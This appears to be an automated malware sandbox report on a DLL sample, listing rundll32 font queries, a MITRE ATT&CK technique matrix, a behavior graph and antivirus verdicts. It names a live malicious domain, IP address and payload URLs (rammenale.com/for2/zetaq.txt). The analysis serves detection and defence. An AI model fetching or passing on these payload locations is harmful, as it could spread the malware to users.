Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\OFFSYML.TTF VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\OFFSYMB.TTF VolumeInformation
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6CDF3270 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_6CDF3270

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
DLL Side-Loading		111
Process Injection		11
Virtualization/Sandbox Evasion		OS Credential Dumping1
System Time Discovery		Remote Services1
Archive Collected Data		11
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading		111
Process Injection		LSASS Memory21
Security Software Discovery		Remote Desktop ProtocolData from Removable Media3
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Deobfuscate/Decode Files or Information		Security Account Manager11
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
Obfuscated Files or Information		NTDS1
File and Directory Discovery		Distributed Component Object ModelInput Capture14
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Rundll32		LSA Secrets22
System Information Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1500942 Sample: UiFttnkl2R.dll Startdate: 29/08/2024 Architecture: WINDOWS Score: 80 27 rammenale.com 2->27 31 Antivirus detection for URL or domain 2->31 33 Multi AV Scanner detection for submitted file 2->33 35 Sigma detected: rundll32 run dll from internet 2->35 37 Sigma detected: Execute DLL with spoofed extension 2->37 9 loaddll32.exe 1 2->9         started        signatures3 process4 process5 11 rundll32.exe 9->11         started        14 rundll32.exe 9->14         started        16 cmd.exe 1 9->16         started        18 conhost.exe 9->18         started        signatures6 39 System process connects to network (likely due to code injection or exploit) 11->39 20 rundll32.exe 12 14->20         started        23 rundll32.exe 16->23         started        process7 dnsIp8 29 rammenale.com 131.153.206.231, 443, 49732, 49733 SS-ASHUS United States 20->29 25 rundll32.exe 23->25         started        process9

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
UiFttnkl2R.dll42%ReversingLabsWin32.Trojan.Generic
UiFttnkl2R.dll51%VirustotalBrowse

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
rammenale.com1%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
http://www.fontbureau.com/designersG0%URL Reputationsafe
http://www.fontbureau.com/designersG0%URL Reputationsafe
http://www.fontbureau.com/designers/?0%URL Reputationsafe
http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
http://www.fontbureau.com/designers?0%URL Reputationsafe
http://www.tiro.com0%URL Reputationsafe
http://www.fontbureau.com/designers0%URL Reputationsafe
http://www.goodfont.co.kr0%URL Reputationsafe
http://www.sajatypeworks.com0%URL Reputationsafe
http://www.typography.netD0%URL Reputationsafe
http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
http://www.fonts.com0%URL Reputationsafe
http://www.sandoll.co.kr0%URL Reputationsafe
http://www.urwpp.deDPlease0%URL Reputationsafe
http://www.zhongyicts.com.cn0%URL Reputationsafe
http://www.sakkal.com0%URL Reputationsafe
http://www.fontbureau.com0%URL Reputationsafe
http://www.microsoft.0%URL Reputationsafe
http://www.carterandcone.coml0%URL Reputationsafe
http://www.fontbureau.com/designers/cabarga.htmlN0%URL Reputationsafe
http://www.founder.com.cn/cn0%URL Reputationsafe
http://www.fontbureau.com/designers/frere-user.html0%URL Reputationsafe
https://rammenale.com/for2/zetaq.txtZ100%Avira URL Cloudmalware
http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
http://www.fontbureau.com/designers80%URL Reputationsafe
https://rammenale.com/for2/zetaq.txtV100%Avira URL Cloudmalware
https://rammenale.com/for2/zetaq.txt100%Avira URL Cloudmalware
https://rammenale.com/for2/zetaq/ts/100%Avira URL Cloudmalware
https://rammenale.com/for2/zetaq.txtC:100%Avira URL Cloudmalware
https://rammenale.com/for2/zetaq.txtL100%Avira URL Cloudmalware
https://rammenale.com/for2/zetaq.txtK100%Avira URL Cloudmalware
https://rammenale.com/for2/zetaq.txt2%VirustotalBrowse
https://rammenale.com/for2/zetaq.txtsC:100%Avira URL Cloudmalware
https://rammenale.com/for2/zetaq.txtC:2%VirustotalBrowse
https://rammenale.com/for2/zetaq.txtG100%Avira URL Cloudmalware
https://rammenale.com/for2/zetaq.txtP$100%Avira URL Cloudmalware
https://rammenale.com/for2/zetaq.txtE100%Avira URL Cloudmalware
https://rammenale.com/for2/zetaq.txtD100%Avira URL Cloudmalware
https://rammenale.com/for2/zetaq.txtw100%Avira URL Cloudmalware
https://rammenale.com/for2/zetaq.txtt100%Avira URL Cloudmalware
https://rammenale.com/for2/zetaq.txtL2%VirustotalBrowse
https://rammenale.com/for2/zetaq.txt6634-1002100%Avira URL Cloudmalware
https://rammenale.com/for2/zetaq.txtr100%Avira URL Cloudmalware
https://rammenale.com/u0%Avira URL Cloudsafe
https://rammenale.com/for2/zetaq100%Avira URL Cloudmalware
https://rammenale.com/for2/zetaq.txtn100%Avira URL Cloudmalware
https://rammenale.com/for2/zetaq.txtent-1002100%Avira URL Cloudmalware
https://rammenale.com/for2/zetaq.txtc100%Avira URL Cloudmalware
https://rammenale.com/for2/zetaq.txtI%100%Avira URL Cloudmalware
https://rammenale.com/for2/zetaq.txtxt100%Avira URL Cloudmalware
https://rammenale.com/for2/zetaq2%VirustotalBrowse
https://rammenale.com/0%Avira URL Cloudsafe
http://www.apache.org/licenses/LICENSE-2.00%Avira URL Cloudsafe
https://rammenale.com/YSTEM320%Avira URL Cloudsafe
http://microsoft.co0%Avira URL Cloudsafe
https://rammenale.com/for2/zetaq.txtxt2%VirustotalBrowse
https://rammenale.com/for2/zetaq.txtPf100%Avira URL Cloudmalware
https://rammenale.com/4%VirustotalBrowse
http://www.apache.org/licenses/LICENSE-2.00%VirustotalBrowse
http://en.wikipedia0%Avira URL Cloudsafe
https://rammenale.com/Data0%Avira URL Cloudsafe
https://rammenale.com/for2/zetaq.txt4U100%Avira URL Cloudmalware
https://rammenale.com/for2/zetaq.txt50100%Avira URL Cloudmalware
https://rammenale.com/for2/zetaq.txtentndowsINetCookies;100%Avira URL Cloudmalware
http://microsoft.co1%VirustotalBrowse
https://rammenale.com/for2/zetaq.txt~100%Avira URL Cloudmalware
https://rammenale.com/for2/zetaq.txtentu100%Avira URL Cloudmalware
https://rammenale.com/for2/zetaq.txt8100%Avira URL Cloudmalware
https://rammenale.com/for2/zetaq.txt4Y100%Avira URL Cloudmalware
https://rammenale.com/fo10280/zet20%Avira URL Cloudsafe
https://rammenale.com/for2/zetaq.txt6100%Avira URL Cloudmalware
https://rammenale.com/8EEF8FF4BF719EAB539B520%Avira URL Cloudsafe
https://rammenale.com/for2/zetaq.txt4100%Avira URL Cloudmalware
https://rammenale.com/for2/zetaq.txtes100%Avira URL Cloudmalware
https://rammenale.com/for2/zetaqtxt100%Avira URL Cloudmalware
https://rammenale.com/for2/zetaq.txt.100%Avira URL Cloudmalware
https://rammenale.com/for2/zetaq.txt4m100%Avira URL Cloudmalware
https://rammenale.com/for2/zetaq.txtent100%Avira URL Cloudmalware
https://rammenale.com/for2/zetaq.txt&100%Avira URL Cloudmalware
https://rammenale.com/for2/zetaqonts/c100%Avira URL Cloudmalware
https://rammenale.com/for2/zetaq.txt#100%Avira URL Cloudmalware
https://rammenale.com/for2/zetaq.txt4er100%Avira URL Cloudmalware
https://rammenale.com/for2/zetaq.txt4q100%Avira URL Cloudmalware
https://rammenale.com/for2/zetaq/a100%Avira URL Cloudmalware

